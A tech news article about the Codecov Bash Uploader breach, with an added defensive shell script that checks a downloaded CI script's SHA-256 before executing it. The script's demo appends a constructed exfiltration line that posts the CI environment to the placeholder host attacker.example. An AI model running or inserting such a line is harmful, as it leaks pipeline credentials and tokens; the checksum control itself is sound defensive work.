Codecov breach triggers fears of another SolarWinds-scale attack


US federal authorities are investigating a security breach suffered by code-coverage tooling company Codecov.

According to a statement put out by the San Francisco-based firm, an attacker gained unauthorized access to its infrastructure and modified its Bash Uploader script, the helper that customers run inside their CI pipelines to upload coverage reports.

Codecov says it has emailed all affected users, but given what the altered script did, thousands of customers are potentially at risk.


Codecov's own analysis attributes the intrusion to an error in its Docker image creation process, which allowed the attacker to extract the credential needed to modify the Bash Uploader script.

Another SolarWinds?

Worryingly, it has emerged that the script was tampered with repeatedly, with the earliest unauthorized modification dating back to January 31, 2021.

The intrusion was only detected months later, on April 1, and not by Codecov's own monitoring: a customer noticed that the checksum (shasum) of the Bash Uploader script they had downloaded did not match the one published on GitHub.

In its statement, Codecov warns that the altered script exported the contents of users' continuous integration (CI) environments to a third-party server outside Codecov's infrastructure. Any customer who executed the tampered Bash Uploader should therefore assume that credentials, tokens, or keys their CI runner exposed to the script, along with anything those secrets could access, may have been compromised.
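The way the customer caught the tampering generalises into a CI-side control: compute the SHA-256 of the downloaded uploader, compare it against the publisher's out-of-band checksum, and refuse to execute on a mismatch. The POSIX shell example below is added here; it is not Codecov's code and is not part of the original article. The expected digest is supplied by the caller (how it is fetched from the publisher is out of scope), the sample "uploader" and the appended exfiltration line are constructed for the demo, and `attacker.example` is a placeholder host.

```shell
#!/usr/bin/env sh
# Added example (not Codecov's code): gate execution of a downloaded CI helper
# script on an out-of-band SHA-256 checksum. The caller supplies the expected
# digest; the demo at the bottom constructs its own sample inputs.

# Print the SHA-256 of a file, using whichever tool the platform provides.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_script FILE EXPECTED_SHA256
# Returns 0 when the digest matches, 1 otherwise. The mismatch branch is the
# point of the exercise: a silently modified uploader must never reach bash.
verify_script() {
    file=$1
    expected=$2
    actual=$(sha256_of "$file")
    if [ "$actual" = "$expected" ]; then
        return 0
    fi
    printf 'checksum mismatch for %s\n  expected %s\n  actual   %s\n' \
        "$file" "$expected" "$actual" >&2
    return 1
}

# run_verified FILE EXPECTED_SHA256 [ARGS...]
# Downloads should be saved to disk, verified, then executed. Piping the
# download straight into bash skips the verification entirely.
run_verified() {
    file=$1
    expected=$2
    shift 2
    verify_script "$file" "$expected" || return 1
    bash "$file" "$@"
}

# Demo on a constructed stand-in for the uploader (not the real Codecov script).
demo() {
    tmp=$(mktemp -d)
    printf '#!/bin/bash\necho "uploading coverage report"\n' > "$tmp/uploader.sh"
    # In a real pipeline the digest comes from the publisher out-of-band; here it
    # is taken from the pristine copy so the demo is self-contained.
    good=$(sha256_of "$tmp/uploader.sh")
    run_verified "$tmp/uploader.sh" "$good"   # digest matches: runs

    # Constructed tampering modelled on the incident: an appended line that ships
    # the CI environment off-host. attacker.example is a placeholder.
    printf 'curl -sm 0.5 -d "$(env)" http://attacker.example/upload || true\n' \
        >> "$tmp/uploader.sh"
    if run_verified "$tmp/uploader.sh" "$good"; then
        echo "BUG: tampered script executed"
    else
        echo "tampered script blocked"
    fi
    rm -rf "$tmp"
}

demo
```

The control only helps if the expected digest does not come from the same place as the script: a checksum served next to a compromised download is under the attacker's control too, so pin it in the repository or fetch it from a separately trusted location.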

While Codecov has taken a number of steps to address the breach, the attack has triggered fears of a SolarWinds-scale supply chain attack, primarily because of how long the tampered script remained in use and because of the size of Codecov's customer base.

Codecov has announced that a federal investigation into the incident is in progress.

Via Reuters

Mayank Sharma

With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’s TechRadar Pro’s expert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.